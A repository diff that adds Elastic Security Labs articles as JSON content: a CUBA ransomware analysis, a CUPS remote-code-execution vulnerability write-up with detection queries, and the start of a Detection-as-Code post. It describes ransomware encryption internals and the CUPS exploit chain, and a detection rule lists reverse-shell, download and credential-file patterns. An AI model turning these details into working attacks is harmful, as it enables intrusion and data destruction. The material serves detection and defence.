the first parameter of the command-line.\n\n**Local keyword parameter**\n\nThe local keyword is used to encrypt every local volume on the machine, and because the malware targets volumes by their ID, it can encrypt both mounted and unmounted volumes.\n\n### Process Termination\n\nCUBA starts by acquiring SeDebugPrivilege and then terminates a hardcoded list of processes and services using a common Windows API (see appendix for list [[1](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#list-of-terminated-processes)], [[2](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#list-of-terminated-services)]). For some services, the malware first tries to disable the service, as indicated by the second parameter of the TerminateProcesses::TerminateServiceByName function. This is mainly done to prevent interference with the encryption process by applications that may lock files from external changes, for example, databases.\n\n\n\n### Local Volume Enumeration\n\nThe malware enumerates all the local volumes and, for each volume larger than 1 GB, saves the volume’s GUID in a custom linked list. The ransomware utilizes the CriticalSection object to access this linked list for synchronization purposes due to multiple threads accessing the same resource. This helps to avoid two threads encrypting the same file at the same time, a race condition that would corrupt the file.\n\n\n\n\n\n### Multithreaded Encryption Synchronization\n\nAfter preparing a list to encrypt, CUBA ransomware spawns encryption threads with the structure defined below as a parameter. Depending on the command line arguments, the malware starts 4 threads for local encryption or 8 threads for network encryption.\n\n\n\nWhen a thread finishes its task, it decrements the counter lpParameter-\\\\>NumberOfThreadRunning until it reaches 0. 
When the last thread completes, it will alert the program that the task is done with a call to the SetEvent API; the malware then deletes itself and terminates.\n\n\n\n### Encryption Implementation\n\nThe malware leverages the symmetric encryption algorithm ChaCha20 to encrypt files and the asymmetric encryption algorithm RSA to protect the ChaCha20 Key and Initialization Vector (IV). The author has utilized a customized version of [WolfSSL](https://github.com/wolfSSL/wolfssl), an open source SSL/TLS library, to implement this capability. Other samples (2957226fc315f71dc22f862065fe376efab9c21d61bbc374dde34d47cde85658) implemented a similar function using the [libtomcrypt](https://github.com/libtom/libtomcrypt) library. Other implementations may exist that are not described here.\n\nThe ransomware allocates a large custom structure called block that contains all the required encryption information. It then initializes an RsaKey structure with [wc_InitRsaKey](https://www.wolfssl.com/doxygen/group__RSA.html#ga02c9b34d405c5f1c24956ee84a843ef6) and decodes an embedded 4096-bit RSA public key in [DER](https://wiki.openssl.org/index.php/DER) format using [wc_RsaPublicKeyDecode](https://www.wolfssl.com/doxygen/group__RSA.html#ga2610326206b322f33f59e31a845e24b9), which it saves to block.PubRsaKey.\n\n\n\n### File Enumeration\n\nEach thread takes an entry from the linked list and recursively enumerates files starting from the root of the volume. In the case of a specific directory, the same function is called recursively except for specific directories (see [appendix](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#excluded-directories) for list). Otherwise, it will ignore the ransom note file !! 
READ ME !!.txt and files with specific extensions (see [appendix](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#excluded-file-extensions) for list).\n\n\n\nThe malware uses [wc_RNG_GenerateBlock](https://www.wolfssl.com/doxygen/group__Random.html#ga9a289fb3f58f4a5f7e15c2b5a1b0d7c6), a WolfSSL function, to randomly generate 44 bytes. The first 32 bytes of that are used as the ChaCha20 key and the other 12 bytes are used as the IV; it then calls a function to initialize the ChaCha20 structure block.chacha20_KeyIv that will later be used to encrypt the file content. At this point, the ransomware is ready to start encrypting and writing to the file.\n\n\n\nBefore encrypting a file, CUBA ransomware prepends a 1024-byte header: the first 256 bytes are the string FIDEL.CA and some DWORD values, the next 512 bytes are the ChaCha20 key/IV encrypted with the public RSA key, and the rest is padded with zeroes.\n\n\n\nBefore starting the encryption, the malware double-checks whether the file was already encrypted by comparing the first 8 bytes of the file to the header string FIDEL.CA. If equal, the malware terminates the encryption process as described below.\n\n\n\nCUBA then writes the 1024-byte header and, if the file is larger than 2 MB, reads 1 MB of data at a time from the file and encrypts it with the ChaCha20 cipher. Otherwise, it will read and encrypt the entire contents at once.\n\n\n\nThe malware encrypts the file in 1 MB chunks and, depending on the file’s size, it will skip a preset number of bytes. 
This is done primarily to speed up the encryption process of large files; the table below illustrates this.\n\n| | | |\n| ---------------- | -------------------- | ------------ |\n| File Size | Chunk Size | Skipped Size |\n| Less than 2 MB | All the file content | 0 MB |\n| Less than 10 MB | 1 MB | 4 MB |\n| Less than 50 MB | 1 MB | 8 MB |\n| Less than 200 MB | 1 MB | 16 MB |\n| Less than 10 GB | 1 MB | 200 MB |\n| More than 10 GB | 1 MB | 500 MB |\n\nFinally, it will rename the file by adding the extension .cuba.\n\n\n\n\n\n## MITRE ATT&CK Techniques\n\nUsing the MITRE ATT&CK® framework, techniques and sub-techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486/)\n- [Network Share Discovery](https://attack.mitre.org/techniques/T1135/)\n- [Process Discovery](https://attack.mitre.org/techniques/T1057/)\n- [Service Stop](https://attack.mitre.org/techniques/T1489/)\n- [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n- [Indicator Removal on Host: File Deletion](https://attack.mitre.org/techniques/T1070/004/)\n- [Obfuscated Files or Information: Software Packing](https://attack.mitre.org/techniques/T1027/002/)\n- [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016/)\n- [System Location Discovery: System Language Discovery](https://attack.mitre.org/techniques/T1614/001/)\n- [Access Token Manipulation](https://attack.mitre.org/techniques/T1134/)\n\n## Appendix\n\n### List of Terminated Processes\n\n- sqlagent.exe\n- sqlservr.exe\n- sqlwriter.exe\n- sqlceip.exe\n- msdtc.exe\n- sqlbrowser.exe\n- vmwp.exe\n- vmsp.exe\n- outlook.exe\n- Microsoft.Exchange.Store.Worker.exe\n\n### List of Terminated Services\n\n- MySQL\n- MySQL80\n- SQLSERVERAGENT\n- MSSQLSERVER\n- SQLWriter\n- SQLTELEMETRY\n- MSDTC\n- SQLBrowser\n- vmcompute\n- vmms\n- 
MSExchangeUMCR\n- MSExchangeUM\n- MSExchangeTransportLogSearch\n- MSExchangeTransport\n- MSExchangeThrottling\n- MSExchangeSubmission\n- MSExchangeServiceHost\n- MSExchangeRPC\n- MSExchangeRepl\n- MSExchangePOP3BE\n- MSExchangePop3\n- MSExchangeNotificationsBroker\n- MSExchangeMailboxReplication\n- MSExchangeMailboxAssistants\n- MSExchangeIS\n- MSExchangeIMAP4BE\n- MSExchangeImap4\n- MSExchangeHMRecovery\n- MSExchangeHM\n- MSExchangeFrontEndTransport\n- MSExchangeFastSearch\n- MSExchangeEdgeSync\n- MSExchangeDiagnostics\n- MSExchangeDelivery\n- MSExchangeDagMgmt\n- MSExchangeCompliance\n- MSExchangeAntispamUpdate\n\n### Excluded Directories\n\n- \\windows\\\n- \\program files\\microsoft office\\\n- \\program files (x86)\\microsoft office\\\n- \\program files\\avs\\\n- \\program files (x86)\\avs\\\n- \\$recycle.bin\\\n- \\boot\\\n- \\recovery\\\n- \\system volume information\\\n- \\msocache\\\n- \\users\\all users\\\n- \\users\\default user\\\n- \\users\\default\\\n- \\temp\\\n- \\inetcache\\\n- \\google\\\n\n### Excluded File Extensions\n\n- .exe\n- .dll\n- .sys\n- .ini\n- .lnk\n- .vbm\n- .cuba\n\n## YARA Rule\n\nElastic Security has created YARA rules to identify CUBA ransomware activity.\n\n```\nrule Windows_Ransomware_Cuba {\n meta:\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Ransomware\"\n family = \"Cuba\"\n threat_name = \"Windows.Ransomware.Cuba\"\n Reference_sample = \"33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e\"\n\n strings:\n $a1 = { 45 EC 8B F9 8B 45 14 89 45 F0 8D 45 E4 50 8D 45 F8 66 0F 13 }\n $a2 = { 8B 06 81 38 46 49 44 45 75 ?? 81 78 04 4C 2E 43 41 74 }\n $b1 = \"We also inform that your databases, ftp server and file server were downloaded by us to our servers.\" ascii fullword\n $b2 = \"Good day. All your files are encrypted. 
For decryption contact us.\" ascii fullword\n $b3 = \".cuba\" wide fullword\n\n condition:\n any of ($a*) or all of ($b*)\n}\n```\n\n## Observations\n\nAtomic indicators observed in our investigation.\n\n| | | |\n| ---------------------------------------------------------------- | ------ | --------------- |\n| Indicator | Type | Note |\n| 32beefe2c5e28e87357813c0ef91f47b631a3dff4a6235256aa123fc77564346 | SHA256 | CUBA Ransomware |\n| 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 | SHA256 | CUBA Ransomware |\n| bcf0f202db47ca671ed6146040795e3c8315b7fb4f886161c675d4ddf5fdd0c4 | SHA256 | CUBA Ransomware |\n\n## Artifacts\n\nArtifacts are also available for download in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "CUBA Ransomware Malware Analysis",
+ "slug": "cuba-ransomware-malware-analysis",
+ "date": "2023-02-14",
+ "description": "Elastic Security has performed a deep technical analysis of the CUBA ransomware family. This includes malware capabilities as well as defensive countermeasures.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "blog-thumb-coin-stacks.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ref9019",
+ "cuba",
+ "ransomware"
+ ]
+ },
+ "id": "security_labs_content-cuba_ransomware_malware_analysis-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cups_overflow-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cups_overflow-md.json
new file mode 100644
index 00000000000..56db5507a49
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cups_overflow-md.json
@@ -0,0 +1,46 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Cups Overflow: When your printer spills more than Ink\"\nslug: \"cups-overflow\"\ndate: \"2024-09-28\"\ndescription: \"Elastic Security Labs discusses detection and mitigation strategies for vulnerabilities in the CUPS printing system, which allow unauthenticated attackers to exploit the system via IPP and mDNS, resulting in remote code execution (RCE) on UNIX-based systems such as Linux, macOS, BSDs, ChromeOS, and Solaris.\"\nauthor:\n - slug: mika-ayenson\n - slug: terrance-dejesus\n - slug: eric-forte\n - slug: ruben-groenewoud\nimage: \"cups-overflow.jpg\"\ncategory:\n - slug: security-research\n - slug: vulnerability-updates\ntags:\n - linux\n - macos\n - cups\n - vulnerability\n - CVE-2024-47176\n - CVE-2024-47076\n - CVE-2024-47175\n - CVE-2024-47177\n---\n\n## Update October 2, 2024\n\nThe following packages introduced out-of-the-box (OOTB) rules to detect the exploitation of these vulnerabilities. Please check your \"Prebuilt Security Detection Rules\" integration versions or visit the [Downloadable rule updates](https://www.elastic.co/guide/en/security/current/prebuilt-rules-downloadable-updates.html) site.\n\n- Stack Version 8.15 - Package Version 8.15.6+\n- Stack Version 8.14 - Package Version 8.14.12+\n- Stack Version 8.13 - Package Version 8.13.18+\n- Stack Version 8.12 - Package Version 8.12.23+\n\n## Key takeaways\n\n* On September 26, 2024, security researcher Simone Margaritelli (@evilsocket) disclosed multiple vulnerabilities affecting the `cups-browsed`, `libcupsfilters`, and `libppd` components of the CUPS printing system, impacting versions \<= 2.0.1.\n* The vulnerabilities allow an unauthenticated remote attacker to exploit the printing system via IPP (Internet Printing Protocol) and mDNS to achieve remote code execution (RCE) on affected systems. 
\n* The attack can be initiated over the public internet or local network, targeting UDP port 631 exposed by `cups-browsed` without any authentication requirements.\n* The vulnerability chain includes the `foomatic-rip` filter, which permits the execution of arbitrary commands through the `FoomaticRIPCommandLine` directive, a known ([CVE-2011-2697](https://nvd.nist.gov/vuln/detail/CVE-2011-2697), [CVE-2011-2964](https://nvd.nist.gov/vuln/detail/CVE-2011-2964)) but unpatched issue since 2011. \n* Systems affected include most GNU/Linux distributions, BSDs, ChromeOS, and Solaris, many of which have the `cups-browsed` service enabled by default. \n* Judging by the title of the publication, “Attacking UNIX Systems via CUPS, Part I”, Margaritelli likely expects to publish further research on the topic.\n* Elastic has provided protections and guidance to help organizations detect and mitigate potential exploitation of these vulnerabilities.\n\n## The CUPS RCE at a glance\n\nOn September 26, 2024, security researcher Simone Margaritelli (@evilsocket) [uncovered](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/) a chain of critical vulnerabilities in the CUPS (Common Unix Printing System) utilities, specifically in components like `cups-browsed`, `libcupsfilters`, and `libppd`. These vulnerabilities — identified as [CVE-2024-47176](https://www.cve.org/CVERecord?id=CVE-2024-47176), [CVE-2024-47076](https://www.cve.org/CVERecord?id=CVE-2024-47076), [CVE-2024-47175](https://www.cve.org/CVERecord?id=CVE-2024-47175), and [CVE-2024-47177](https://www.cve.org/CVERecord?id=CVE-2024-47177) — affect widely adopted UNIX systems such as GNU/Linux, BSDs, ChromeOS, and Solaris, exposing them to remote code execution (RCE).\n\nAt the core of the issue is the lack of input validation in the CUPS components, which allows attackers to exploit the Internet Printing Protocol (IPP). 
Attackers can send malicious packets to the target's UDP port `631` over the Internet (WAN) or spoof DNS-SD/mDNS advertisements within a local network (LAN), forcing the vulnerable system to connect to a malicious IPP server.\n\nFor context, the IPP is an application layer protocol used to send and receive print jobs over the network. These communications include sending information regarding the state of the printer (paper jams, low ink, etc.) and the state of any jobs. IPP is supported across all major operating systems including Windows, macOS, and Linux. When a printer is available, the printer broadcasts (via DNS) a message stating that the printer is ready including its Uniform Resource Identifier (URI). When Linux workstations receive this message, many Linux default configurations will automatically add and register the printer for use within the OS. As such, the malicious printer in this case will be automatically registered and made available for print jobs.\n\nUpon connecting, the malicious server returns crafted IPP attributes that are injected into PostScript Printer Description (PPD) files, which are used by CUPS to describe printer properties. These manipulated PPD files enable the attacker to execute arbitrary commands when a print job is triggered.\n\nOne of the major vulnerabilities in this chain is the `foomatic-rip` filter, which has been known to allow arbitrary command execution through the FoomaticRIPCommandLine directive. Despite being vulnerable for over a decade, it remains unpatched in many modern CUPS implementations, further exacerbating the risk.\n\n> While these vulnerabilities are highly critical with a CVSS score as high as 9.9, they can be mitigated by disabling cups-browsed, blocking UDP port 631, and updating CUPS to a patched version. 
Many UNIX systems have this service enabled by default, making this an urgent issue for affected organizations to address.\n\n## Elastic’s POC analysis\n\nElastic’s Threat Research Engineers initially located the original proof-of-concept written by @evilsocket, which had been leaked. However, we chose to utilize the [cupshax](https://github.com/RickdeJager/cupshax/blob/main/cupshax.py) proof of concept (PoC) based on its ability to execute locally. \n\nTo start, the PoC made use of a custom Python class that was responsible for creating and registering the fake printer service on the network using mDNS/ZeroConf. This is mainly achieved by creating a ZeroConf service entry for the fake Internet Printing Protocol (IPP) printer. \n\nUpon execution, the PoC broadcasts a fake printer advertisement and listens for IPP requests. When a vulnerable system sees the broadcast, the victim automatically requests the printer's attributes from a URL provided in the broadcast message. The PoC responds with IPP attributes including the FoomaticRIPCommandLine parameter, which is known for its history of CVEs. The victim generates and saves a [PostScript Printer Description](https://en.wikipedia.org/wiki/PostScript_Printer_Description) (PPD) file from these IPP attributes.\n\nAt this point, continued execution requires user interaction to start a print job and choose to send it to the fake printer. Once a print job is sent, the PPD file tells CUPS how to handle the print job. 
The included FoomaticRIPCommandLine directive allows arbitrary command execution on the victim machine.\n\nDuring our review and testing of the exploits with the Cupshax PoC, we identified several notable hurdles and key details about the vulnerable endpoints and execution processes.\n\nWhen running arbitrary commands to create files, we noticed that `lp` is the user and group reported for arbitrary command execution, the [default printing group](https://wiki.debian.org/SystemGroups#:~:text=lp%20(LP)%3A%20Members%20of,jobs%20sent%20by%20other%20users.) on Linux systems that use CUPS utilities. Thus, the Cupshax PoC/exploit requires both the CUPS vulnerabilities and the `lp` user to have sufficient permissions to retrieve and run a malicious payload. By default, the `lp` user on many systems will have these permissions to run effective payloads such as reverse shells; however, an alternative mitigation is to restrict `lp` such that these payloads are ineffective through native controls available within Linux such as AppArmor or SELinux policies, alongside firewall or iptables enforcement policies. \n\nThe `lp` user in many default configurations has access to commands that are not required for the print service, for instance `telnet`. To reduce the attack surface, we recommend removing unnecessary services and adding restrictions to them where needed to prevent the `lp` user from using them. \n\nWe also took note that interactive reverse shells are not immediately supported through this technique, since the `lp` user does not have a login shell; however, with some creative tactics, we were still able to accomplish this with the PoC. Typical PoCs test the exploit by writing a file to `/tmp/`, which is trivial to detect in most cases. 
Note that the user writing this file will be `lp`, so similar behavior will be present for attackers downloading and saving a payload on disk.\n\nAlongside these observations, the parent process, `foomatic-rip`, was observed in our telemetry executing a shell, which is highly uncommon.\n\n## Executing the ‘Cupshax’ PoC\n\nTo demonstrate the impact of these vulnerabilities, we attempted to accomplish two different scenarios: invoking a reverse shell payload using living-off-the-land techniques, and retrieving and executing a remote payload. Adversarial groups commonly attempt these actions once a vulnerable system is identified. While exploitation is in its infancy and has not been widely observed, future attacks will likely replicate some of the scenarios depicted below.\n\nOur first attempts running the Cupshax PoC were met with a number of minor roadblocks due to the default user groups assigned to the `lp` user — namely restrictions around interactive logon, an attribute common to users that require remote access to systems. This did not, however, impact our ability to download a remote payload, compile, and execute on the impacted host system:\n\n\n\nContinued testing was performed around reverse shell invocation, successfully demonstrated below: \n\n\n\n## Assessing impact\n\n* **Severity:** These vulnerabilities are given CVSS scores [controversially](https://x.com/evilsocket/status/1838220677389656127) up to 9.9, indicating a critical severity. The widespread use of CUPS and the ability to remotely exploit these vulnerabilities make this a high-risk issue.\n* **Who is affected?:** The vulnerability affects most UNIX-based systems, including major GNU/Linux distributions and other operating systems like ChromeOS and BSDs running the impacted CUPS components. Public-facing or network-exposed systems are particularly at risk. 
Further guidance and notifications will likely be provided by vendors as patches become available, alongside further remediation steps. Even though CUPS usually listens on localhost, a Shodan report [highlights](https://x.com/shodanhq/status/1839418045757845925) that over 75,000 CUPS services are exposed on the internet.\n* **Potential Damage:** Once exploited, attackers can gain control over the system to run arbitrary commands. Depending on the environment, this can lead to data exfiltration, ransomware installation, or other malicious actions. Systems connected to printers over WAN are especially at risk since attackers can exploit this without needing internal network access. \n\n## Remediations\n\nAs [highlighted](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Remediation) by @evilsocket, there are several remediation recommendations.\n\n* Disable and uninstall the `cups-browsed` service. For example, see the recommendations from [Red Hat](https://www.redhat.com/en/blog/red-hat-response-openprinting-cups-vulnerabilities) and [Ubuntu](https://ubuntu.com/blog/cups-remote-code-execution-vulnerability-fix-available).\n* Ensure your CUPS packages are updated to the latest versions available for your distribution.\n* If updating isn’t possible, block UDP port `631` and DNS-SD traffic from potentially impacted hosts, and investigate the aforementioned recommendations to further harden the `lp` user and group configuration on the host.\n\n## Elastic protections\n\nIn this section, we look into detection and hunting queries designed to uncover suspicious activity linked to the currently published vulnerabilities. 
By focusing on process behaviors and command execution patterns, these queries help identify potential exploitation attempts before they escalate into full-blown attacks.\n\n### cupsd or foomatic-rip shell execution\n\nThe first detection rule targets processes on Linux systems that are spawned by `foomatic-rip` and immediately launch a shell. This is effective because legitimate print jobs rarely require shell execution, making this behavior a strong indicator of malicious activity. Note: A shell may not always be an adversary’s goal if arbitrary command execution is possible. \n\n```\nprocess where host.os.type == \"linux\" and event.type == \"start\" and\n event.action == \"exec\" and process.parent.name == \"foomatic-rip\" and\n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") \n and not process.command_line like (\"*/tmp/foomatic-*\", \"*-sDEVICE=ps2write*\")\n```\n\nThis query managed to detect all 33 PoC attempts that we performed:\n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml\n\n### Printer user (lp) shell execution\n\nThis detection rule assumes that the default printer user (`lp`) handles the printing processes. By specifying this user, we can narrow the scope while broadening the parent process list to include `cupsd`. 
Although there's currently no indication that RCE can be exploited through `cupsd`, we cannot rule out the possibility.\n\n```\nprocess where host.os.type == \"linux\" and event.type == \"start\" and\n event.action == \"exec\" and user.name == \"lp\" and\n process.parent.name in (\"cupsd\", \"foomatic-rip\", \"bash\", \"dash\", \"sh\", \n \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.name in (\"bash\", \"dash\", \n \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and not process.command_line \n like (\"*/tmp/foomatic-*\", \"*-sDEVICE=ps2write*\")\n```\n\nBy focusing on the username `lp`, we broadened the scope and detected, like previously, all of the 33 PoC executions:\n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml\n\n### Network connection by CUPS foomatic-rip child\n\nThis rule identifies network connections initiated by child processes of `foomatic-rip`, which is a behavior that raises suspicion. Since legitimate operations typically do not involve these processes establishing outbound connections, any detected activity should be closely examined. If such communications are expected in your environment, ensure that the destination IPs are properly excluded to avoid unnecessary alerts.\n\n```\nsequence by host.id with maxspan=10s\n [process where host.os.type == \"linux\" and event.type == \"start\" \n and event.action == \"exec\" and\n process.parent.name == \"foomatic-rip\" and\n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")] \n by process.entity_id\n [network where host.os.type == \"linux\" and event.type == \"start\" and \n event.action == \"connection_attempted\"] by process.parent.entity_id\n```\n\nBy capturing the parent/child relationship, we ensure the network connections originate from the potentially compromised application. 
\n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml\n\n### File creation by CUPS foomatic-rip child\n\nThis rule detects suspicious file creation events initiated by child processes of foomatic-rip. As all current proof-of-concepts have a default testing payload of writing to a file in `/tmp/`, this rule would catch that. Additionally, it can detect scenarios where an attacker downloads a malicious payload and subsequently creates a file.\n\n```\nsequence by host.id with maxspan=10s\n [process where host.os.type == \"linux\" and event.type == \"start\" and \n event.action == \"exec\" and process.parent.name == \"foomatic-rip\" and \n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")] by process.entity_id\n [file where host.os.type == \"linux\" and event.type != \"deletion\" and\n not (process.name == \"gs\" and file.path like \"/tmp/gs_*\")] by process.parent.entity_id\n```\n\nThe rule excludes `/tmp/gs_*` to account for default `cupsd` behavior, but for enhanced security, you may choose to remove this exclusion, keeping in mind that it may generate more noise in alerts.\n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml\n\n### Suspicious execution from foomatic-rip or cupsd parent\n\nThis rule detects suspicious command lines executed by child processes of `foomatic-rip` and `cupsd`. 
It focuses on identifying potentially malicious activities, including persistence mechanisms, file downloads, encoding/decoding operations, reverse shells, and shared-object loading via GTFOBins.\n\n```\nprocess where host.os.type == \"linux\" and event.type == \"start\" and \n event.action == \"exec\" and process.parent.name in \n (\"foomatic-rip\", \"cupsd\") and process.command_line like (\n // persistence\n \"*cron*\", \"*/etc/rc.local*\", \"*/dev/tcp/*\", \"*/etc/init.d*\", \n \"*/etc/update-motd.d*\", \"*/etc/sudoers*\",\n \"*/etc/profile*\", \"*autostart*\", \"*/etc/ssh*\", \"*/home/*/.ssh/*\", \n \"*/root/.ssh*\", \"*~/.ssh/*\", \"*udev*\", \"*/etc/shadow*\", \"*/etc/passwd*\",\n // Downloads\n \"*curl*\", \"*wget*\",\n\n // encoding and decoding\n \"*base64 *\", \"*base32 *\", \"*xxd *\", \"*openssl*\",\n\n // reverse connections\n \"*GS_ARGS=*\", \"*/dev/tcp*\", \"*/dev/udp/*\", \"*import*pty*spawn*\", \"*import*subprocess*call*\", \"*TCPSocket.new*\",\n \"*TCPSocket.open*\", \"*io.popen*\", \"*os.execute*\", \"*fsockopen*\", \"*disown*\", \"*nohup*\",\n\n // SO loads\n \"*openssl*-engine*.so*\", \"*cdll.LoadLibrary*.so*\", \"*ruby*-e**Fiddle.dlopen*.so*\", \"*Fiddle.dlopen*.so*\",\n \"*cdll.LoadLibrary*.so*\",\n\n // misc. 
suspicious command lines\n  \"*/etc/ld.so*\", \"*/dev/shm/*\", \"*/var/tmp*\", \"*echo*\", \"*>>*\", \"*|*\"\n)\n```\n\nBy restricting the match to these suspicious command lines, as we did in the rule above, we can broaden the scope to also detect the `cupsd` parent without fear of false positives.\n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml\n\n### Elastic’s Attack Discovery\n\nIn addition to the published prebuilt content, [Elastic’s Attack Discovery](https://www.elastic.co/guide/en/security/current/attack-discovery.html) can provide context and insights by analyzing alerts in your environment and identifying threats by leveraging Large Language Models (LLMs). In the following example, Attack Discovery provides a short summary and a timeline of the activity. The behaviors are then mapped to an attack chain to highlight impacted stages and help triage the alerts.\n\n\n\n## Conclusion\n\nThe recent CUPS vulnerability disclosure highlights the evolving threat landscape, underscoring the importance of securing services like printing. With a high CVSS score, this issue calls for immediate action, particularly given how easily these flaws can be exploited remotely. Although the service is installed by default on some UNIX operating systems (based on supply chain), manual user interaction is needed to trigger the printer job. We recommend that users remain vigilant, continue hunting, and not underestimate the risk. While the threat requires user interaction, a spear phishing document may coerce victims into printing via the rogue printer. Worse still, attackers may silently replace existing printers or install new ones, as [indicated](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Impact) by @evilsocket.\n\nWe expect more to be revealed, as the initial disclosure was labeled part 1. 
Ultimately, visibility and detection capabilities remain at the forefront of defensive strategies for these systems, ensuring that attackers cannot exploit overlooked vulnerabilities. \n\n## Key References\n\n* [https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/)\n* [https://github.com/RickdeJager/cupshax/blob/main/cupshax.py](https://github.com/RickdeJager/cupshax/blob/main/cupshax.py)\n* [https://www.cve.org/CVERecord?id=CVE-2024-47076](https://www.cve.org/CVERecord?id=CVE-2024-47076)\n* [https://www.cve.org/CVERecord?id=CVE-2024-47175](https://www.cve.org/CVERecord?id=CVE-2024-47175)\n* [https://www.cve.org/CVERecord?id=CVE-2024-47176](https://www.cve.org/CVERecord?id=CVE-2024-47176)\n* [https://www.cve.org/CVERecord?id=CVE-2024-47177](https://www.cve.org/CVERecord?id=CVE-2024-47177)\n\n*The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.*\n"
+ },
+ "title": "Cups Overflow: When your printer spills more than Ink",
+ "slug": "cups-overflow",
+ "date": "2024-09-28",
+ "description": "Elastic Security Labs discusses detection and mitigation strategies for vulnerabilities in the CUPS printing system, which allow unauthenticated attackers to exploit the system via IPP and mDNS, resulting in remote code execution (RCE) on UNIX-based systems such as Linux, macOS, BSDs, ChromeOS, and Solaris.",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ },
+ {
+ "slug": "terrance-dejesus"
+ },
+ {
+ "slug": "eric-forte"
+ },
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "cups-overflow.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ],
+ "tags": [
+ "linux",
+ "macos",
+ "cups",
+ "vulnerability",
+ "CVE-2024-47176",
+ "CVE-2024-47076",
+ "CVE-2024-47175",
+ "CVE-2024-47177"
+ ]
+ },
+ "id": "security_labs_content-cups_overflow-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dac_beta_release-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dac_beta_release-md.json
new file mode 100644
index 00000000000..ff5a1ccc94e
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dac_beta_release-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Now in beta: New Detection as Code capabilities\"\nslug: \"dac-beta-release\"\ndate: \"2024-08-08\"\ndescription: \"\"\nauthor:\n - slug: mika-ayenson\n - slug: eric-forte\nimage: \"Security Labs Images 18.jpg\"\ncategory:\n - slug: detection-science\n---\n\nExciting news! Our Detections as Code (DaC) improvements to the [detection-rules](https://github.com/elastic/detection-rules) repo are now in beta. In May this year, we shared the Alpha stages of our research into [Rolling your own Detections as Code with Elastic Security](https://www.elastic.co/blog/detections-as-code-elastic-security). Elastic is working on supporting DaC in Elastic Security. While in the future DaC will be integrated within the UI, the current updates are focused on the detection rules repo on main to allow users to set up DaC quickly and get immediate value with available tests and commands integration with Elastic Security. We have a considerable amount of [documentation](https://dac-reference.readthedocs.io/en/latest/index.html) and [examples](https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html), but let’s take a quick look at what this means for our users. \n\n## Why DaC?\n\nFrom validation and automation to enhancing cross-vendor content, there are several reasons [previously discussed](https://www.elastic.co/blog/detections-as-code-elastic-security#why-detections-as-code) to use a DaC approach for rule management. Our team of detection engineers have been using the detection rules repo for testing and validation of our rules for some time. We now can provide the same testing and validation that we perform in a more accessible way. We aim to empower our users by adding straightforward CLI commands within our detection-rules repo, to help manage rules across the full rule lifecycle between version control systems (VCS) and Kibana. 
